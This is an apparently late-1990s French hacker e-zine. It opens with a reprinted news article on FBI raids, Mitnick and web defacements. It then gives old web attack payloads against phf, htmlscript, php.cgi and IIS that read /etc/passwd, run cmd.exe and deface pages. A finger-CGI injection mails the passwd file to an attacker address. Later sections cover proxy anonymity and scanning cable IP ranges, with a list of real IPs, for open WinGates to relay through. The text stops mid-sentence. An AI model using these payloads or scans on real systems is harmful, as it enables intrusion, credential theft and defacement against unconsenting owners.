``They're shutting down access to Web sites, sometimes for hours, sometimes for days, and it makes it impossible for people who want access to that Web source to get it.'' Moreover, there's far more at risk than down time for Web servers, contends Peter Mell, who conducts hacker research for the National Institute of Standards and Technology, a division of the U.S. Commerce Department. ``Real harm can be done,'' Mell said. ``A lot of people download their tax forms from the IRS today. What if someone broke into the IRS Web server and changed just a single number? It would cause supreme chaos.'' Mell also pointed to electronic banking and stock trading, saying Web servers today handle increasing amounts of sensitive information. ``This isn't child's play anymore,'' he said. ``I pay my bills online. I trade stocks online. In that kind of environment, I can't afford people breaking into computers.'' [Nd MadDany : ben qu'est-ce tu veux y en aura toujours des plus forts que toi] The FBI heartily agrees, though it has not characterized its crackdown on hackers in quite the grandiose terms that hackers do. ``We don't have a war against hackers. We're following our mandate, which is to investigate violations of federal law,'' said Bill Carter, a spokesman for the FBI's headquarters in Washington. ``The fact that these hackers or hacker groups have their noses out of joint over this, we can't help that.'' Most hackers are not caught, but the recent raids suggest the FBI is starting to get better at tracking them. The agency has about 500 open computer crimes cases at any given time. But the federal agents' methods - charging in with warrants and bulletproof vests - worries some in the hacking community. ``For those of us in the scene for a number of years, it's starting to get scary only because we worry it's going to turn into a witch hunt,'' said Space Rogue, a member of the Boston-area group L0pht Heavy Industries, a former hacker clan that now bills itself as an electronic think tank. ``While defacements will probably continue no matter what law enforcement officials do, it would be very easy for the government to just start executing search warrants left and right, seizing computers and scaring people half to death.'' Internet watchdogs - and some hackers themselves - say that while the crackdown should continue, the real issue is computer security. Space Rogue argues that nearly all Web page defacements are carried out with known security flaws in software. As an example, he said, his group e-mailed the Army's webmaster about a flaw in its ColdFusion server software a month before someone used the hole to hack into the Army's Web site. ``It comes down to the person in charge of the machine and whether they're taking their security seriously,'' Space Rogue said. ``This sort of thing never should have happened in the first place.'' Settle, the former FBI computer crimes chief, says the danger will be far greater when those doing the hacking aren't teens out for kicks but terrorists intent on electronic warfare. ``Our computer systems today are like cars operating without safety equipment: no headlights, no bumpers, no airbags, no roofs,'' he said. ``Heck, if teenagers can do this, what can sophisticated intelligence operatives do? This is just a taste of things to come.'' The government acknowledges as much. In testimony before a congressional panel, government security experts said government computers are easy marks because employees lack training, because well-trained staff flee for the bigger paycheck of the private sector and because internal security procedures often aren't followed. ``Most federal agencies continue to lack the ability to detect against and recover from cyber attacks,'' U.S. Rep. Connie Morella (R-Md.), chair of the House Science Subcommittee on Technology, said at the June 23 hearing. To combat the deficiency, the Clinton administration last week proposed spending $1.5 billion in the next fiscal year on a sophisticated intruder warning system that would be installed on military, government and private-sector computer networks by 2003. [Nd MadDany : il bluffe il le fera pas... enfin on a plus qu'à espérer...] Operating something like a burglar alarm, the system would detect break-ins, funneling that information to a central location. ``A concerted attack on the computers of any one of our key economic sectors or governmental agencies could have catastrophic effects,'' Clinton wrote in a draft cover letter accompanying the proposal. Civil libertarians and Internet privacy watchdogs already have protested the plan, saying it will give the government unprecedented surveillance powers, equipping authorities with the tools to peruse the private dispatches of the masses. House Majority Leader Dick Armey (R-Texas) joined in the criticism, deriding the plan as an opportunity for ``government peeping toms.'' No matter the government response, hackers will, no doubt, continue mounting challenges, probing for deficiencies in networks and deriding those who chase them. ``You can stop one, but you can not stop all,'' hackers wrote when they defaced the U.S. Senate Web page for the second time in late June. A more recent defacement of an obscure Venezuelan Web page repeated the theme, carrying a ``call to arms'' imploring competing hacker groups to unite to ``win this war.'' ``Remember, this is our world, not the government's,'' the page read. Time will tell. Prosecuted `cracker' a martyr to techies In hacker circles, he is a modern-day martyr, a technological tinkerer whose attacks on other people's computers amounted to harmless exploration before the FBI swooped down on him, dubbing him Online Enemy No. 1. To prosecutors and to judges, he is a dangerous miscreant whose ability to crack computer systems and whose propensity for running from the law required that he be held without bail. Kevin Mitnick, for four years the cause celebre of the Internet's dark side, could soon be going free. Mitnick, 35, who pleaded guilty in March to multiple counts of computer and wire fraud for breaking into systems and stealing software from such companies as Sun Microsystems [Nd MadDany : les développeurs du langage Java], Novell, Motorola and Nokia, will be sentenced Aug. 9 under a plea agreement that could, with good behavior credits, allow him to leave federal prison within weeks. ``Kevin is optimistic that this case will be over and that he can get on with his life,'' said Mitnick's lawyer, Donald C. Randolph of Santa Monica, Calif. But even if Mitnick himself fades into obscurity, his cause is unlikely to follow. In the hacking community, Mitnick long ago became a symbol of what hackers term gross government over-reaction, a theme repeatedly hammered home by Randolph. ``The government prosecution of Mr. Mitnick was to carry out an agenda launched by them in the 1990s,'' Randolph said. ``The government wanted to demonstrate they were going to be tough on computer terrorism. Unfortunately, the government did not have a bonafide computer terrorist to prosecute, so they went after Mr. Mitnick, a recreational hacker who was arrested with a big splash and who became a convenient target.'' Randolph's comments could be dismissed as the arguments of a defense lawyer looking to gain sympathy for his client, but he's not the only one making them. Drew Williams, who founded Axent Technologies' SWAT team to respond to hacking incidents for clients, said the government miscalculated with Mitnick. ``I am not a Mitnick supporter at all. However, I think the government did in fact set out to make an example and instead made a martyr,'' Williams said. ``An individual's rights to due process probably got a little trampled.'' Denied bail on charges that could have initially landed him in jail for a century, Mitnick appealed all the way to the U.S. Supreme Court, where the justices declined to hear his lawyer's argument that bail should be set. Hackers have seized on the bail issue, leaving ``Free Kevin'' messages on the Web sites they hack. Recent examples include the home pages of the U.S. Senate and Greenpeace, where hackers left the tongue-in-cheek message ``Free Mitnick or we will club 600 baby seals.'' There is also a ``Free Kevin'' Web site (www.freekevin.com) that gives Mitnick updates and carries a confinement clock showing - to the second - how long Mitnick has been jailed. Randolph argues that while people should be prosecuted for breaking into systems, the law needs to be refined to distinguish between recreational hackers and information terrorists. ``I do not quarrel at all with the government's right to prosecute computer fraud and to go after computer terrorists, but it's high time they distinguish between high crimes and misdemeanors so they're not trumpeting the arrest of the century when the suspect is a kid on a laptop,'' Randolph said. Mitnick's prosecutors insist they have not overreached, that Mitnick caused millions in damage by stealing and changing information in computer systems. ``This is someone whose conduct over a 2-year period was very broad and very serious,'' Assistant U.S. Attorney Christopher Painter said. ``He hit a huge number of companies with a lot of damage. He is not the victim.'' If Mitnick does win his freedom soon, it could be short-lived. The Los Angeles County District Attorney's Office is preparing its own case against him on charges similar to the federal claim. Randolph said he's confident Mitnick, in the end, will prevail. ``In 1995, the press and the public were fooled into thinking Kevin Mitnick was this cyber bogeyman,'' he said. ``That type of argument doesn't fly in 1999. People know better.'' Sites that have been targeted Here's a partial list of Web sites that have been attacked in recent months. In most cases, the sites were defaced. In others, a flood of requests for service overwhelmed Web servers, rendering them unusable. In several of the attacks, the intruders called the acts revenge for FBI ``harassment'' of hackers. Bell South eBay (on-line auctioneer) FBI Fort Monmouth (N.J.) U.S. Army Garrison Georgetown University Harvard University Idaho National Engineering and Environmental Laboratory (conducts research for the U.S. Department of Energy) Illinois Comptroller's Office NASA Goddard Space Flight Center National Oceanic and Atmospheric Administration Storm Prediction Center State of Virginia home page University of California-Davis University of Colorado University of Michigan University of Wisconsin U.S. Army main Web site U.S. Coast Guard U.S. Department of Agriculture U.S. Department of Education U.S. Department of the Interior U.S. Department of Labor U.S. Information Agency U.S. Navy U.S. Senate (twice) The White House ----------------------------------------------------------------- Voilà...On comprend mieux après ca pourquoi ca fout les boules aux entreprises et aux gouvernements... (Je l'ai pas traduit...désolé, pas le temps mais si quelqu'un veux me le traduire, j'attends...) [Nd MadDany : t'es pas fou t'as vu la taille ? :o)] ======================================================================== LISTE DES PORTS Par MADDANNY !!! ======================================================================== Connecting... Time out, retrying... Connected --->>> Les ports tcp les plus connus, by MadDany <<<--- Loading.... Type your commands here : list Command OK Loading list... Port Service 7 echo 9 discard 11 systat 13 daytime 15 netstat 17 qotd 19 chargen 20 ftp-data 21 ftp 23 telnet 25 smtp 37 time 42 name 43 whois 53 nameserver 57 apts 59 apfs 77 rje 79 finger 80 http 87 link 95 supdup 100 newacct [usage interdit] 101 hostnames 102 iso-tsap 103 x400 104 x400-snd 105 csnet-ns 109 pop2 110 pop3 111 sunrpc 113 auth 115 sftp 117 uucp-path 119 nntp 123 ntp 133 statsrv 136 profile 144 news 170 print-srv 443 https 512 exec 513 login 514 cmd 515 printer 520 efs 526 tempo 530 courier 531 conference 532 netnews 540 uucp 543 klogin 544 kshell 555 dfs 556 remotefs 562 chshell 570 meter 600 pcserver 607 nqs 666 mdqs 750 rfile 751 pump 752 qrh 753 rrh 754 tell 758 nlogin 759 con 760 ns 761 rxe 762 quotad 763 clycleserv 764 omserv 765 webster 767 phonebook 769 vid 771 rtip 772 cycleserv2 773 submit 774 rpasswd 775 entomb 776 wpages 780 wpgs 800 mdbs 801 device 997 maitrd 998 busboy 999 garcon 1025 blackjack 1347 bbn-mmc 1348 bbn-mmx 1524 ingreslock 1525 orasrv 1600 issd 1650 nkd 2001 dc 2004 mailbox 2005 berknet 2006 invokator 2007 dectalk 2008 conf 2009 news 2010 search 2011 raid-cc 2012 tty-info 2013 raid-am 2014 troff 2015 cypress 2017 cypress-stat 2018 terminaldb 2019 whosockami 2021 servexec 2022 down 2025 ellpack 2027 shadowserver 2028 submitserver 2030 device2 2032 blackboard 2033 glogger 2034 scoremgr 2035 imsldoc 2038 objectmanager 2040 lam 2041 interbase 2042 isis 2044 rimsl 2047 dls 2048 dls-monitor 2049 shilp 3049 nsws 4672 rfa 5000 complexmain 5001 complexlink 5236 padl2sim 6666 complete-write/read-access 9535 man List loaded Type your commands here : open port 6666 Command OK Are you sure ? This will give you complete access to the server y/n : y Command OK Fuck you lamer, disconnecting... Disconnected [note de MadDany : c'est une blague le port 6666, essayez pas de vous y connecter comme un gros lame pendant des heures, pas comme le débile du texte...] ======================================================================== HACK DE SERVEUR WEB avec votre BROWSER ======================================================================== Hacker un serveur, mais pourquoi faire ? Hacker un serveur est pour The Underground Angels l'occupation principale afin de faire passer nos idées... C'est donc très utile mais pour cela, il faut les passwords... Rien de plus simple avec ces quelques bugs de récupérer les fichier passwd et shadow généralement ds le répertoire /etc/ Il suffit ensuite de faire marcher son pc avec un crackeur comme John The Ripper. Voici la liste: HTTP - htmlscript SERVICE: http BUG: Htmlscript (www.htmlscript.com) vous autorise l'acces aux fichiers systemes du serveur. IMPACT: Les utilisateurs sans droits peuvent via leur navigateur lire n'importe quel fichier systeme du serveur. EXEMPLE: Il suffit de taper: http://www.victime.com/cgi-bin/htmlscript?../../../../../etc/passwd Le nombre de repertoires est lie bien sur a l'emplacement du fichier "passwd" ou du fichier que vous voulez lire et aussi de l'emplacement du repertoire "CGI-BIN". HTTP - phf SERVICE: http BUG: Le script phf distribue avec le serveur http NCSA, version NCSA/1.5a et anterieures ainsi que le serveur Apache anterieure a la version 1.0.5 ne filtrent pas certaines requêtes IMPACT: Via le WEB les utilisateurs peuvent executer certaines commandes par l'intermediaire du daemon http HISTORIQUE: Le bug a ete decouvert le 12 mars 1996 Une liste de serveurs est disponible par l'intermediaire de commandes speciales de ALTA VISTA EXEMPLE: http://victime.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Cet exemple vous permet de recuperer le fichier /etc/passwd a partir d'un serveur vulnerable. HTTP - php.cgi SERVICE: http BUG: Voici un bug identique a celui de phf decrit ci dessus EXEMPLE: http://victime.com/cgi-bin/php.cgi?/etc/passwd Vous permet de recuperer comme le phf le fichier /etc/passwd HTTP - Microsoft IIS/1.0 pre service pack 3 SERVICE: http PROGRAMME: Microsoft internet-Server/1.0 anterieure au pack 3 BUG: Le serveur autorise certaines commandes en dehors du chemin initial IMPACT: Les utilisateurs peuvent prendre le control du serveur :) DESCRIPTION: Il est possible de recuperer des fichiers et d'executer des commandes en dehors du chemin "www" en ajoutant ".." dans le chemin d'acces. Dans les exemples suivants le chemin d'acces envisage de IIS est c:\inetsrv et pour Windows NT c:\winn35 http://your.host.name/scripts/anyold.cmd?&dir+c:\ http://your.host.name/scripts/anyold.bat?&dir+c:\ http://your.host.name/..\..\autoexec.bat http://your.host.name/scripts/../../../winnt35/win.ini http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"Hi There"+>c:\temp\hello.txt http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp Vous en voulez encore ?? En voici: FINGER BOX C'est pour avoir accès au finger d'un site comme hummm, AOL par exemple... Il suffit de taper l'adresse comme http://www.aol.com et de rajouter: /cgi-bin/finger à la fin. Ce qui donne: Http://www.aol.com/cgi-bin/finger Voilà, si ca marche, vous devez voir apparaitre une boite de dialogue vous demandant le nom que vous voulez finger. Vous aurez probablement le fichier /etc/passwd dans la foulée... Ensuite, cherchez dans la page les tags 'mailto' (pour les adresses), retournez dans la boite Finger et tapez: nobody@nowhere.org ; /bin/mail moi@hackeur.org < etc/passwd {Le Neuneu} {rep. Mail} {mon adresse} {fichier passwd} Vous devriez alors recevoir le fichier passwd dans votre boite... CGI Cette partie vous expliquera comment recevoir le fichier /etc/passwd à partir du formaulaire Cgi de quelqu'un. Regardez d'abord le source du fichier:

This is a form to go to Modify

C'est un simple formulaire qui demande à l'utilisateur de rentrer un message qui sera envoyé à un script appelé 'doc.pl' Dans ce script, il y a une ligne qui peut tout changer !!! hahaah c'est: system("/usr/lib/sendmail -t $myaddress < $tempfile") A vous de vous en servir. Faites votre propre fichier HTML contenant:

Hack AOL

Voilà, vous aurez encore le fichier passwd avec cette technique... MODIFIER UN FICHIER HTML Envie de rajouter une image, du texte etc...dans un fichier html ? Rien de plus simple: tapez apres une adresse comme AOL (http://www.aol.com/) la ligne suivante: cgi-bin/phf?Qalias=x%0a/bin/echo%20 "Tout ce que vous voulez dire..."%20>>filename.html Attention de bien employer le language html pour modifier tout ca.... Voilà ! Certains bugs ont été corrigés dans les nouvelles versions de ces logiciels... Mais bon, il doit en rester quelques uns qui continuent d'utiliser ces logiciels... Mais sinon, dans, les nouvelles versions qui sortent, il doit sûrement avoir des bugs (Surtout chez Kro...)...Envoyez moi vos listes de bugs... White Angel ======================================================================== ---///> Da UltImAtE HaCker'Z TeSt, by MadDany <\\\--- ======================================================================== Bon, on va voir si vous êtes un vrai hacker... cette fois vous pourrez pas vous échapper... Ready ? Go ! [Nd de WA: Repondez par oui ou par non] 001 Avez vous déjà raté un rendez-vous parce que vous étiez devant votre ordinateur ? 002 ... raté un mariage ? 003 ... raté votre propre mariage ? 004 Avez vous déjà essayé de changer la valeur de 4 ? 005 ... avez vous réussi ? 006 Est-ce que vous savez depuis combien de jours vous êtes né ? 007 Est-ce que vous avez déjà essayé de télécharger une pizza ? 008 Pouvez vous écrire avec les valeurs ASCII ? 009 Est-ce que vous pouvez nommer les puissances de 2 supérieures à 2!32 ? 010 Est-ce que vous entendez votre ordinateur vous parler ? 011 ... est-ce que vous avez déjà agressé un de vos amis avec un marteau parce que votre ordinateur vous a dit de le faire ? 012 Est-ce que vous arrivez à reproduire les bruits d'un modem ? 013 ... supérieur à 28 Kbps ? 014 Est-ce que vous avez déjà essayé de parler à votre modem ? 015 ... est-ce qu'il a répondu ? 016 Est-ce que vous enregistrez les bruits de votre imprimante et appelez ça du Techno Industrial Modern Jazz ? 017 Pouvez-vous convertir de l'hexa en octal dans votre tête ? 018 Avez vous regardé votre ordinateur d'un oeil bizarre quand vous avez appris qu'il contenait des cookies ? 019 ... avez vous déjà essayé de le démonter rien que pour vérifier que c'était vrai ? 020 ... avez vous poussé un soupir de soulagement en vous rendant compte que c'étaient des bobards destinés à vous mystifier ? 021 Est-ce que vous avez plus d'un ordinateur ? 022 ... 4 ordinateurs ? 023 ... 16 ordinateurs ? 024 Avez vous un disque dur de plus de 16 mégaoctets ? 025 ... 256 Mo ? 026 ... 1 gigaoctets ? 027 ... 16 Go ? 028 ... 256 Go ? 029 ... 1 teraoctets ? 030 Est-ce que vous avez une bibliothèque ? 031 ... avez vous remplacé tous les livres par des disquettes ? 032 Avez vous déjà refusé une promotion parce que votre nouvel ordinateur de bureau était moins puissant ? 033 Est-ce que vous récitez les ports de communication dans l'ordre pendant votre sommeil ? 034 Est-ce que vous connaissez plus d'un langage de programmation ? 035 ... plus de 4 ? 036 ... plus de 16 ? 037 ... plus de 32 ? 038 ... est-ce que vous rêvez dans un de ces langages ? 039 Est-ce que vous avez déjà créé un langage de programmation ? 040 Avez vous déjà crashé un système ? 041 ... était-ce fait exprès ? 042 Est-ce que vous connaissez des vrais gens qui arrivent à parler sans clavier ? 043 ... plus d'une personne ? 044 ... plus de 2 personnes ??? 045 Est-ce que vous avez fait vos lacets ? 046 Est-ce que vous arrivez à communiquer normalement avec des étrangers ? 047 Est-ce que vous voyez les objets tridimensionnels en mode fil de fer ? 048 ... est-ce que vous trouvez ça normal ? 049 Est-ce que vous décorez votre frigo avec des disquettes ? 050 Avez-vous déjà demandé à votre mèdecin de vous faire un scandisk ? 051 ... est-ce qu'il vous a envoyé à la place chez des gens habillés en blanc qui vous ont prêté une jolie chemise et fait des piqûres ? 052 Avez vous déjà écrit un programme quelconque ? 053 ... un compilateur ? 054 ... un virus ? 055 ... un prophylactique ? 056 Avez-vous déà écrit un programme qui s'est exécuté correctement du premier coup ? 057 ... est-ce que le code faisait plus de 20 lignes ? 058 ... plus de 100 lignes ? 059 ... est-ce que vous pouvez le réciter à l'envers ? 060 Avez vous déjà calculé un nombre premier de plus de 100 chiffres ? 061 Est-ce que vous pouvez réciter toutes les couleurs des boxes et leurs fonctions ? 062 ... est-ce que votre téléphone ressemble encore à quelque chose ? 063 Avez-vous déjà passé plus de dix minutes à chercher une erreur de frappe dans un fichier source ? 064 ... plus d'une heure ? 065 ... plus d'un jour ? 066 ... plus d'une semaine ? 067 ... est-ce que la première personne a qui vous avez montré la source a trouvé l'erreur sur le champ ? 068 ... est-ce que vous avez assommé cette personne avec votre clavier et caché le corps derrière le meuble ? Voilà, je crois qu'avec ça vous pourrez évaluer votre niveau assez fidèlement.... ;^) [Pour ce texte je me suis pas mal inspiré d'un exte anglais, et pis j'ai rajouté mes blagues. MadDany] ======================================================================== Rester ANONYME sur le Web ======================================================================== Les sujets sont: 1.Que sont les 'packets' 2.Obtenir un proxy http 3.Comment fonctionne un proxy http 4.Comment sécuriser les 'packets' http 5.Comment éditer les infos que votre OS et votre browser envoie 6.Obtenir un proxy (socket proxy) fonctionnant sur le socket 7.Comment fonctionne un 'socket proxy' 8.Cookies 9.Conclusion ------------------------------------------------------------------------- 1. Que sont les packets Les packets sont utilisés par tous les internautes...C'est vraiment la notion basique à connaitre... Les Packets peuvent être assimilé à des messages mis en capsules que le serveur et le client s'échangent pour se reconnaitre. Lorsque vous vous connectez à une machine distante, les packets servent à identifier qui est connecté... Voici un exemple de packet: [Connect from undergroundangel.cjb.net] [208.11.17.52] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on August 15, 1999 at 14:34:45 Maintenant, je vais vous expliquer ce que ça signifie si vous ne savez pas. *Note*: Les packets http sont ce que vous utilisez pour envoyer des infos avec votre browser vers un serveur/Machine/site. [connected from undergroundangel.cjb.net]-C'est l'Hote [208.11.17.52]- C'est l'IP (Mozilla/4.05)- C'est la version de Mozilla utilisée (Netscape) (X11;I;Linux 2.0.32 i586)- C'est mon OS et sa version [Nd MadDany : baaaah du Linux] [On August 15, 1999 at 14:34:45] - C'est le jour/année/heure C'est utilisé tout à fait légalement par des serveur pour savoir qui vous êtes mais aussi par des Hackers pour mieux vous connaitre..hahaha Il faut savoir que les proxys ont été inventés pour donner une sécurité à l'utilisateur et empecher de connaitre ces informations... Mais utiliser des proxys anonymes n'est pas à 100% fiable, un bon hacker peut quand même avoir votre hote/ip..etc mais ca sera plus dur pour lui... Maintenant, les packet http ne sont pas les seuls, il existe des sockets packets (Packet de connexion) Mais nous verrons cela + tard... 2.Comment fonctionne un proxy http Un proxy http fonctionne comme un serveur. vous configurez votre browser pour qu'il se connecte au proxy lorsque vous voulez voir un site. Votre browser se connectera donc d'abord au proxy et le proxy se connectera au site que vous voulez voir...Vous aurez ainsi le site voulu et le serveur ne verra que l'IP du proxy. Moi et mon Ordinateur (je tape: http://www.le_site.com/) | | | \|/ Mon Browser internet se connecte tout seul au proxy | | | \|/ Le proxy va sur http://www.le_site.com | | | \|/ Le Site.com ne vois que les packets du proxy et pas les votres Ensuite le proxy vous renvois les pages.... Si le proxy ne fonctionne pas, c'est qu'il n'est plus valable ou mal configuré... Nous verrons comment configurer un proxy plus tard... [Nd MadDany : je me permets de préciser quelques trucs. Les serveurs proxys sont utilisés dans des grandes entreprises disposant d'un réseau local (LAN) qui veulent mettre leurs ordinateurs sur le réseau Internet. Pour des raisons de sécurité évidentes ils ne peuvent pas se permettre de fournir une connexion individuelle à chaque machine, ils vont donc connecter les ordinateurs à un serveur proxy qui va faire le lien entre le réseau local et le réseau distant. Ainsi quelle que soit la machine connectée sur un serveur, ce dernier verra le proxy. En pratique lorsque vous vous connectez sur le proxy vous lui donnez des ordres qu'il transmet au serveur sur lequel vous vous connectez, et ensuite le serveur renvoie les informations au proxy, qui vous les transmet à nouveau. Le serveur n'a donc (en théorie) pas connaissance de vos informations personnelles. De plus la connexion est considérablement ralentie par tous ces processus supplémantaires, étant donné qu'à aucun moment vous ne créez de connexion TCP (directe) sur le serveur. Voilà] [Nd WA: Merci Mad] 3.Obtenir un proxy Http Les proxys http sont très simple à trouver sur le net et sont libres à utiliser... Il faut juste bien choisir son proxy, dans sa région de préférence pour que la connexion soit plus rapide... Je vous aurais bien donné une liste de proxys mais je ne sais pas s'ils fonctionnent et si ils seront valables longtemps... Allez voir http://www.proxy4all.com [Nd MadDany : ou demandez moi] 4. Comment sécuriser les packets http Comme je l'ai dis avant, ceci est un packet classique: [Connect from undergroundangel.cjb.net] [208.11.17.52] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on August 15, 1999 at 14:34:45 Maintenant, pour rendre votre ip et votre nom d'hote anonyme, nous allons utiliser un proxy avec votre browser internet. Allez dans les options ---> dans la configuration du proxy et rentrez toutes les infos necessaires à se configuration du proxy: ftp, http, port...etc Maintenant, vos packets ressembleront a ça: [Connect from The_proxies_host] [The_proxies_ip] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on august 15, 1999 at 14:34:45 ) Vous remarquerez que le serveur connait votre OS. Je vous expliquerai plus tard comment remédier à ça... Maintenant, vous pensez être totalement anonyme ... Mais non, car si un hacker hack le serveur proxy et compare les logs avec votre heure de connexion, il retrouvera votre IP/Hote. Mais c'est quand même un gros boulot de comparer les logs... [Nd MadDany : certains proxys ne loggent pas les personnes qui se connectent sur eux, comme pour les WINGates (voir plus loin)] 5.Comment éditer les infos que votre Browser et votre OS envoie. Vous pouvez modifier les nom de vos versions de Win etc..dans: GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion ProductName = Microsoft Windows 95 Version = Windows 95 GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform (Vos Parametres originaux sont là) = IEAK(Tes parametres originaux) Exemple GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform Cool [Unix-Base] = IEAKCool [Unix-Base] *Note (Je n'ai rien testé alors, je ne sais pas si ca marche...) [Nd MadDany : pour ceux qui connaissent pas l'éditeur du registre, il faut taper "regedit" dans la commande exécuter du menu démarrer de Windows. Ensuite vous cherchez l'arborescence spécifiée et vous double cliquez sur l'élément qui nous intéresse, et enfin vous modifiez sa valeur dans la case de texte qui apparait. Ouf !] [Nd WA: On sait jamais, avec ceux qui utilisent nunuX...] 6.Obtenir un socket proxy Les sockets proxys fonctionnent comme les proxys http à la seule différence qu'ils sont utilisé avec des programmes comme Icq ou Mirc et les packets sont envoyés a travers les sockets et non pas les http. (Vous me suivez toujours ?) Trouver un socket proxy est plus dur car il est dédié à un programme bien spécifique et il est limité aux personnes qui l'utilisent. Http est déjà utilisé pour toutes sortes d'emplois. Nous auront donc toujours besoin de serveur proxy. POUR trouver un socket proxy vous pouvez chercher sur le net (socket proxy) ou essayer certains noms de programmes comme Icq proxy. Si tout vas bien, vous aurez un socket proxy qui sera utile pour vous protéger des lames qui jouent avec des nukers..etc. Et vous ne serez ennuyé comme un utilisateur de mirc ou icq à qui ont peut voir l'IP et le nom d'Hote Vous me direz...A quoi ca sert de faire ca alors qu'on peut spoofer.. Et là, je vous réponds: "Le Spoof, c'est pas stable, tandis que les proxys sont stables..." Il existe beaucoup de sockets proxy...A vous de les trouver en cherchant sur le net.. 7.Comment fonctionne un Socket Proxy. Quand vous recevez ou envoyez un fichier pour le serveur ou l'utilisateur à travers le socket, il se passe ceci: ( established a connection on undergroundangel.cjb.net port 1030 ) Et il n'y a pas de log sur l'ordinateur avec l'heure et la date... C'est pkoi vous avez besoin d'un socket proxy car les hacker peuvent savoir ce que vous faites... [Nd MadDany : moi qui croyait que c'était nous les hackers...] [Nd WA: Oui mais y'en a qui se familiarise avec le milieu du hacking pour mieux se protéger] 8.Cookies Ok, les cookies une autre manière d'envoyer des infos du serveur/isp vers votre ordinateur. Les cookies contiennent des infos sur les pages web que vous avez visité, sur ce que vous avez chargé et votre IP/hote et date et heure. Les hackers peuvent utiliser ça pour 2 raisons: 1. Obtenir les infos necessaire pour vous hacker 2. Etre capable de savoir tout ce que vous avez fait sans que vous le sachiez. Avec votre Browser, vous pouvez stopper les cookies. Allez ds les options. [Nd MadDany : avec IE 5.0, faites Outils/Options Internet.../Onglet Sécurité/Personnaliser le niveau. Là vous pourrez contrôler les niveaux de sécurité des contrôles ActiveX, Java, les cookies... Pour effacer ceux qui sont déjà contenus dans votre ordi allez faire un tour dans c:/Windows/Temporary Internet Files et c:/Windows/Cookies. Je vous conseille aussi de paramétrer Internet Explorer pour ne pas conserver l'historique des sites que vous visitez (dans le même menu que tout à l'heure). Les temporary internet files sont très intéressants lorsqu'on veut savoir quels sites vous visitez (on retrouve les bannières, les photos plus ou moins évocatrices...), alors dans les options internet, cliquez sur l'onglet Avancées et cochez la case tout en bas (vider le dossier temporary internet files dès que vous fermez le browser)] Now With all browsers now u can stop even limit cookies from the oriene of your server.Go to your options u will find something on cookies there in ya browser. Now this is very limiting so if ya a linux/unix user there is a nice little program i know that will go that few steps furture. Visit. (http://www.lne.com/ericm/cookie_jar/) THis program called "Cookie jar" alows u to limit sites from your computer limit if u get cookies from that site/server its goes the extra steps u need. 9.Conclusion Bon, voilà... C'est un document en anglais que j'ai traduit... Y'a des lacunes et quelques erreurs mais bon...Ca a surement éclaircit les newbies dans le domaine des proxys... White Angel ======================================================================== ---///> No mORe Mot A fUcKiN' BlooD SuCkEr WorMs <\\\--- ======================================================================== Je vous avais dit que mes titres avaient rien à voir. Donc, comme son titre ne l'indique toujours pas, ce texte va vous apprendre à peu près tout ce que je sais sur les WinGates. WinGate est un programme qui splitte les connexions, ainsi ceux qui ont le câble l'utilisent souvent comme ça ils peuvent partager la connexion par le câble avec tous les ordinateurs de leur maison. Autrement dit, plusieurs ordinateurs peuvent se connecter sur le WinGate et ainsi se trimbaler sur les réseaux avec la même identité. Là où ça devient intéressant pour nous c'est lorsqu'on trouve un serveur équipé de WinGate, sur lequel on va se connecter et naviguer à partir de là. Lorsqu'on va chercher à avoir des infos sur nous on trouvera celles du WinGate. Spoofing rulez ! Comment reconnaître un serveur équipé de WinGate ? Connectez-vous à ce serveur par telnet sur le port 23 (telnet serveur.com 23 dans la commande exécuter du menu démarrer), si c'est un WinGate vous tomberez sur une invite ressemblant à ça : WinGate> Comment trouver un tel serveur ? Eh bien il n'y a pas de critère bien particulier qui permette d'identifier un serveur avec ou sans WinGate, mais on peut effectuer des recherches plutôt globales. Comme je vous l'ai dit ce sont souvent des personnes qui ont le câble qui sont équipées de WinGate, vous pouvez donc essayer de scanner les IP du style 24.1.x.x, c'est la rangée d'IP de la compagnie Cox Cable. Pour faire cela utilisez un dommain scanner, vous allez entrer par exemple 24.1.156.x et il va scanner tous les IP commençant par 24.1.156, puis il va vous dire lesquels répondent. Si vous n'avez pas déjà ce genre d'outils je vous conseille de le chercher (on le trouve assez facilement). J'ai commencé un peu le scan et voici les IP que j'ai trouvés qui répondent sur le port 1080 : 24.1.2.59 24.1.6.108 24.1.6.152 24.1.6.248 24.1.8.175 24.1.9.37 24.1.9.68 !!! gateway 24.1.9.127 24.1.9.199 24.1.9.213 24.1.9.224 24.1.9.245 24.1.10.48 24.1.10.121 24.1.10.209 24.1.11.58 24.1.11.116 24.1.12.220 24.1.13.80 24.1.15.197 24.1.15.240 24.1.18.190 24.1.18.209 !!! surement un gateway 24.1.19.128 !!! idem 24.1.19.142 24.1.24.229 24.1.24.251 24.1.25.204 Je me suis arrêté aux 24.1.25.x, mais je n'ai pas trouvé de WinGates. Une fois que vous avez votre liste d'IPs vous les telnettez sur le port 23 et vous regardez l'invite. Vous voyez ici que j'ai trouvé des GateWays, qui ont une invite ressemblant beaucoup à WinGate : GateWay> Le fonctionnement a l'air semblable, et je pense qu'on peut donc les utiliser aussi pour spoofer, mais je ne confirme pas, faute d'informations. Si vous connaissez les GateWays mailez moi. Vous remarquez que j'ai scanné sur le port 1080, car ce port identifie les SOCKS Proxys, ce qui peut nous amener à tomber sur un WinGate. Donc en clair pour chercher des WinGates, vous pouvez essayer de trouver des IP de personnes ayant le câble, ou scanner des grandes rangées d'IP à la recherche du port 1080. Les IP que vous trouverez de cette manière seront généralement statiques. Mais il se peut que vous tombiez sur un IP dynamique, c'est à dire qu'il ne marchera qu'une fois, dès que le possesseur du WinGate se reconnectera son IP aura changé. Au lieu de vous lamenter sur votre sort estimez vous heureux, les WinGates dynamiques sont encore plus efficace, je vous expliquerai plus loin pourquoi. Regardez plutôt le format de cet IP dynamique, il est probable que l'ISP (Internet Service 